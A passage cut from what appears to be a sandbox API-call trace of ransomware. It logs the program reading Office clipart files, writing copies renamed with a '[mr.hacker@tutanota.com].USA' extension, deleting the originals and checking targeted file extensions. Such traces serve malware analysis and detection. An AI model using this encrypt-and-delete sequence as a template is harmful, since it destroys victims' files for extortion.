"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.469] GetLastError () returned 0x0 [0272.469] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x2994, lpOverlapped=0x0) returned 1 [0272.471] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x29a0, lpOverlapped=0x0) returned 1 [0272.472] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.472] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.472] SetEndOfFile (hFile=0x39c) returned 1 [0272.472] CloseHandle (hObject=0x39c) returned 1 [0272.472] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.472] SetEndOfFile (hFile=0x388) returned 1 [0272.474] CloseHandle (hObject=0x388) returned 1 [0272.474] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf")) returned 1 [0272.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.475] lstrlenW (lpString=".doc") returned 4 [0272.475] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.475] lstrlenW (lpString=".docx") returned 5 [0272.475] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.475] lstrlenW (lpString=".pdf") returned 4 [0272.475] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.475] lstrlenW (lpString=".xls") returned 4 [0272.475] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.475] lstrlenW (lpString=".xlsx") returned 5 [0272.475] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.475] lstrlenW (lpString=".ppt") returned 4 [0272.475] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.475] lstrlenW (lpString=".zip") returned 4 [0272.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.476] lstrlenW (lpString=".rar") returned 4 [0272.476] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString=".bz2") returned 4 [0272.476] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString=".7z") returned 3 [0272.476] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.476] lstrlenW (lpString=".dbf") returned 4 [0272.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.476] lstrlenW (lpString=".1cd") returned 4 [0272.476] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.476] lstrlenW (lpString=".jpg") returned 4 [0272.476] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.476] lstrlenW (lpString=".doc") returned 4 [0272.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString=".docx") returned 5 [0272.476] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.476] lstrlenW (lpString=".pdf") returned 4 [0272.476] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString=".xls") returned 4 [0272.476] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.476] lstrlenW (lpString=".xlsx") returned 5 [0272.476] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.476] lstrlenW (lpString=".ppt") returned 4 [0272.476] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.476] lstrlenW (lpString=".zip") returned 4 [0272.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.477] lstrlenW (lpString=".rar") returned 4 [0272.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.477] lstrlenW (lpString=".bz2") returned 4 [0272.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.477] lstrlenW (lpString=".7z") returned 3 [0272.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.477] lstrlenW (lpString=".dbf") returned 4 [0272.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.477] lstrlenW (lpString=".1cd") returned 4 [0272.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 63 [0272.477] lstrlenW (lpString=".jpg") returned 4 [0272.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.477] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.477] lstrlenW (lpString="HH00625_.WMF") returned 12 [0272.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.477] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=2116) returned 1 [0272.478] CloseHandle (hObject=0x388) returned 1 [0272.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf")) returned 0x20 [0272.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.478] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.478] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.478] GetLastError () returned 0x0 [0272.478] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x844, lpOverlapped=0x0) returned 1 [0272.480] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x850, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x850, lpOverlapped=0x0) returned 1 [0272.481] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.481] WriteFile (in: hFile=0x39c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.481] SetEndOfFile (hFile=0x39c) returned 1 [0272.481] CloseHandle (hObject=0x39c) returned 1 [0272.481] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.481] SetEndOfFile (hFile=0x388) returned 1 [0272.483] CloseHandle (hObject=0x388) returned 1 [0272.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf")) returned 1 [0272.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.484] lstrlenW (lpString=".doc") returned 4 [0272.484] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.484] lstrlenW (lpString=".docx") returned 5 [0272.484] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.484] lstrlenW (lpString=".pdf") returned 4 [0272.484] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.484] lstrlenW (lpString=".xls") returned 4 [0272.484] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.484] lstrlenW (lpString=".xlsx") returned 5 [0272.484] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.484] lstrlenW (lpString=".ppt") returned 4 [0272.484] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.484] lstrlenW (lpString=".zip") returned 4 [0272.484] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.484] lstrlenW (lpString=".rar") returned 4 [0272.484] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.484] lstrlenW (lpString=".bz2") returned 4 [0272.484] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.484] lstrlenW (lpString=".7z") returned 3 [0272.484] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.484] lstrlenW (lpString=".dbf") returned 4 [0272.484] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.485] lstrlenW (lpString=".1cd") returned 4 [0272.485] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.485] lstrlenW (lpString=".jpg") returned 4 [0272.485] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.485] lstrlenW (lpString=".doc") returned 4 [0272.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString=".docx") returned 5 [0272.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.485] lstrlenW (lpString=".pdf") returned 4 [0272.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString=".xls") returned 4 [0272.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.485] lstrlenW (lpString=".xlsx") returned 5 [0272.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.485] lstrlenW (lpString=".ppt") returned 4 [0272.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.485] lstrlenW (lpString=".zip") returned 4 [0272.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.485] lstrlenW (lpString=".rar") returned 4 [0272.485] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString=".bz2") returned 4 [0272.485] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.485] lstrlenW (lpString=".7z") returned 3 [0272.485] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.485] lstrlenW (lpString=".dbf") returned 4 [0272.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.486] lstrlenW (lpString=".1cd") returned 4 [0272.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF") returned 63 [0272.486] lstrlenW (lpString=".jpg") returned 4 [0272.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.486] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.486] lstrlenW (lpString="HH00636_.WMF") returned 12 [0272.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.700] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=1568) returned 1 [0272.700] CloseHandle (hObject=0x388) returned 1 [0272.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf")) returned 0x20 [0272.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.886] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.886] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0272.887] GetLastError () returned 0x0 [0272.887] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x620, lpOverlapped=0x0) returned 1 [0272.925] WriteFile (in: hFile=0x398, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0x630, lpOverlapped=0x0) returned 1 [0272.926] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.926] WriteFile (in: hFile=0x398, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.926] SetEndOfFile (hFile=0x398) returned 1 [0272.926] CloseHandle (hObject=0x398) returned 1 [0272.926] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.926] SetEndOfFile (hFile=0x2ac) returned 1 [0272.928] CloseHandle (hObject=0x2ac) returned 1 [0272.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.928] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf")) returned 1 [0272.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.928] lstrlenW (lpString=".doc") returned 4 [0272.928] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.928] lstrlenW (lpString=".docx") returned 5 [0272.929] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.929] lstrlenW (lpString=".pdf") returned 4 [0272.929] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString=".xls") returned 4 [0272.929] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.929] lstrlenW (lpString=".xlsx") returned 5 [0272.929] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.929] lstrlenW (lpString=".ppt") returned 4 [0272.929] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.929] lstrlenW (lpString=".zip") returned 4 [0272.929] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.929] lstrlenW (lpString=".rar") returned 4 [0272.929] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString=".bz2") returned 4 [0272.929] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString=".7z") returned 3 [0272.929] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.929] lstrlenW (lpString=".dbf") returned 4 [0272.929] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.929] lstrlenW (lpString=".1cd") returned 4 [0272.929] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.929] lstrlenW (lpString=".jpg") returned 4 [0272.929] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.929] lstrlenW (lpString=".doc") returned 4 [0272.929] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString=".docx") returned 5 [0272.930] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0272.930] lstrlenW (lpString=".pdf") returned 4 [0272.930] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString=".xls") returned 4 [0272.930] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0272.930] lstrlenW (lpString=".xlsx") returned 5 [0272.930] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0272.930] lstrlenW (lpString=".ppt") returned 4 [0272.930] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.930] lstrlenW (lpString=".zip") returned 4 [0272.930] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0272.930] lstrlenW (lpString=".rar") returned 4 [0272.930] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString=".bz2") returned 4 [0272.930] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString=".7z") returned 3 [0272.930] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0272.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.930] lstrlenW (lpString=".dbf") returned 4 [0272.930] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.930] lstrlenW (lpString=".1cd") returned 4 [0272.930] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0272.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF") returned 63 [0272.930] lstrlenW (lpString=".jpg") returned 4 [0272.930] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0272.930] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0272.931] lstrlenW (lpString="HH00681_.WMF") returned 12 [0272.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.931] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x2e7ff1c | out: lpFileSize=0x2e7ff1c*=9300) returned 1 [0272.931] CloseHandle (hObject=0x2ac) returned 1 [0272.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf")) returned 0x20 [0272.931] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0272.931] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.931] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e7fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0272.932] GetLastError () returned 0x0 [0272.932] ReadFile (in: hFile=0x2ac, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e7fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e7fed4*=0x2454, lpOverlapped=0x0) returned 1 [0272.959] WriteFile (in: hFile=0x398, lpBuffer=0x35c0020*, 